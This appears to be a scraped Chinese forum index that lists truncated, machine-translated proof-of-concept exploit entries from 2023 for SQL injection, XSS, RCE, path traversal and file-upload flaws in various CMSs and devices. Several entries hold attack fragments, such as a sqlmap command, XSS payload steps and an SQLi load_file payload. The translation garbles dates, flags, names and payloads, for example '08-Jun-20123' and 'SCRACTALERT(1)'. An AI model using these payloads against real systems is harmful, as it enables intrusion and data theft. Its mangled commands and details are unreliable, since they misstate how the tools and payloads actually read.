POC/?Day

#title: MotoCMS版本3.4.3 -SQL注入 #作者: TMRSWRR #日期: 01/06/2023 #vendor: #link: #脆弱版本: MOTOCMS 3.4.3 ## 描述 MotoCMS版本3.4.3通过关键字参数注入SQL。 ##复制步骤 1)访问URL: 2)运行sqlmap -u' - landom -agent - level -5 -crisk 3...
回复
0
查看
4
#利用title:文件管理器高级快捷代码2.3.2-未身份定制的远程代码执行(RCE) #date: 05/31/2023 #利用作者: Mateus Machado Tesser #供应商HomePage3360 #版本:文件经理高级短代码2.3.2 #在: WordPress 6.1/linux(Ubuntu)5.15测试 #CVE: CVE-2023-2068 导入请求 进口JSON...
回复
0
查看
4
#利用标题:宏观专家4.9-未引用的服务路径 #日期: 04/06/2023 #利用作者: Murat Demirci #供应商HomePage3360 #软件链接: #版本: 4.9 #测试在: Windows 10 #概念证明: C: \ User \ Muratsc QC'宏观专家' [SC] QueryServiceConfig成功 service_name:宏观专家 类型: 10...
回复
0
查看
4
#利用标题:树页面视图插件1.6.7-交叉站点脚本(XSS) #Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/ #日期: 2023-04-24 #利用作者: Lee Se Hyoung(hackintoanetwork) #供应商homepage3360 #软件link: #类别: Web应用程序 #版本: 1.6.7...
回复
0
查看
3
#利用标题: USB闪存驱动器控制4.1.0.0-未引用的服务路径 #日期: 2023-31-05 #利用作者: Jeffrey Bencteux #供应商homepage: #软件link: #版本: 4.1.0.0 #测试在: Microsoft Windows 11 Pro #漏洞类型:未引用的服务路径 PS C: \...
回复
0
查看
4
#利用标题: Thruk监视Web界面3.06-路径遍历 #date: 08-Jun-20123 #利用作者: Galoget Latorre(@galoget) #CVE: CVE-2023-34096(Galoget Latorre) #供应商homepage: #软件link: #软件链接+ exploit + poc(备份): #cve作者博客: #github安全咨询...
回复
0
查看
4
#利用标题: WordPress主题WorkReap 2.2.2-未经身份验证的上传导致远程代码执行 #dork: inurl:/wp-content/themes/workreap/ #日期: 2023-06-01 #类别: WebApps #供应商HomePage3360 #剥削作者:穆罕默德马云惹不起马云霍斯辛马云惹不起马云卡纳基(MR_B0HL00L) #版本: 2.2.2 #在...
回复
0
查看
4
#利用标题:在线考试系统项目1.0-跨站点请求伪造(CSRF) #Google Dork: N/A #date: 09/06/2023 #利用作者: Ramil Mustafayev(Kryptohaker) #供应商homepage3360 #软件link: #版本: 1.0 #在: Windows 10,Windows 8.0.28/php 8.0.28 #CVE : N/A...
回复
0
查看
4
利用标题:教师记录管理系统1.0 - 文件上传类型验证 日期: 17-01-2023 exploit-author: affan ahmed 供应商HomePage: 软件link: 版本: 1.0 在: Windows 11 + XAMPP上测试 CVE : CVE-2023-3187 ========================================...
回复
0
查看
4
利用标题:销售跟踪器管理系统v1.0 - 多个漏洞 Google Dork: NA 日期: 09-06-2023 exploit-author: affan ahmed 供应商homepage: 软件link: 版本: 1.0 在: Windows 11 + XAMPP上测试 CVE : CVE-2023-3184...
回复
0
查看
4
利用标题: ANEVIA FLAMINGO XS 3.6.5-身份验证的根远程代码执行 利用作者:液态虫 vendor: Ateme 产品网页: 受影响的版本: 3.6.5 硬件修订版: 1.1 肥皂2.4.0 肥皂系统1.3.1 Summary: Flamingo XL,一种新的模块化和高密度IPTV头端 酒店和公司市场的产品。火烈鸟XL捕获 卫星,有线,数字地面的直播电视和广播内容...
回复
0
查看
4
exploit title: Anevia Flamingo XL 3.6.20-身份验证的根远程代码执行 利用作者:液态虫 vendor: Ateme 产品网页: 受影响的版本: 3.6.20,3.2.9 硬件修订1.1,1.0 肥皂2.4.1,2.0.3 肥皂系统1.3.1 Summary: Flamingo XL,一种新的模块化和高密度IPTV头端...
回复
0
查看
3
利用标题: Anevia Flamingo XL 3.2.9-远程根越狱 利用作者:液态虫 产品网页: 受影响的版本: 3.2.9 硬件修订1.0 肥皂2.0.3 Summary: Flamingo XL,一种新的模块化和高密度IPTV头端 酒店和公司市场的产品。火烈鸟XL捕获 卫星,有线,数字地面的直播电视和广播内容 和模拟源在通过IP网络将其流式传输到STB之前,PC...
回复
0
查看
4
利用标题: ProjectsEND R1605 -CSV注入 版本: R1605 BUGS: CSV注入 Technology: php 供应商URL: 软件link: 发现的日期: 11-06-2023 作者:MirabbasAğalarov 在: Windows上测试 2。技术细节POC...
回复
0
查看
4
利用标题: Projectsent r1605-存储的XSS Application: ProjectsEND 版本: R1605 BUGS:存储的XSS Technology: php 供应商URL: 软件link: 发现的日期: 11-06-2023 作者:MirabbasAğalarov 在: Linux上测试 2。技术细节POC...
回复
0
查看
4
#利用标题: MONSTRA 3.0.4-存储的跨站点脚本(XSS) #日期: 2023-06-13 #利用作者: TMRSWRR #供应商homepage: #软件link: #版本: 3.0.4 #测试: - - 描述 - - 1)登录管理面板并转到第:页 2)单击编辑按钮,然后在名称字段中写入有效载荷: PAYLOAD:'SCRACTALERT(1)/脚本 3)保存更改后,您会看到警报按钮
回复
0
查看
4
#利用标题: XOOPS CMS 2.5.10-存储的跨站点脚本(XSS)(认证) #日期: 2023-06-12 #利用作者: TMRSWRR #供应商homepage: #软件 #版本: 2.5.10 #测试: - - 描述 - - 1)登录管理面板并单击图像管理器,选择添加类别: 2)在类别名称字段和提交:中写下有效载荷 PAYLOAD: SCRIPTTALET(1)/脚本...
回复
0
查看
4
##利用title:在线论文归档系统v1.0-多sqli ##作者: nu11secur1ty ## date: 06.12.2023 ## vendor: ## Software: ##参考: ## Description: 密码参数似乎很容易受到SQL注入的影响 攻击。有效载荷'+(选择 load_file('\\\\\...
回复
0
查看
4
#exploit title: textpattern cms v4.8.8-存储的跨站点脚本(XSS)(认证) #日期: 2023-06-13 #利用作者: TMRSWRR #供应商HomePage: #软件link: #版本: v4.8.8 #测试: https://release-demo.textpattern.co/ - - 描述 - - 1)登录管理页面,选择内容,文章第:节...
回复
0
查看
4
#利用标题:在线艺术画廊项目1.0-任意文件上传(未经身份验证) #Google Dork: N/A #日期: 14/06/2023 #利用作者: Ramil Mustafayev #供应商homepage3360 #软件link: #版本: 1.0 #在: Windows 10,Windows 8.0.28/php 8.0.28 #CVE : N/A #漏洞描述: #...
回复
0
查看
4
后退
顶部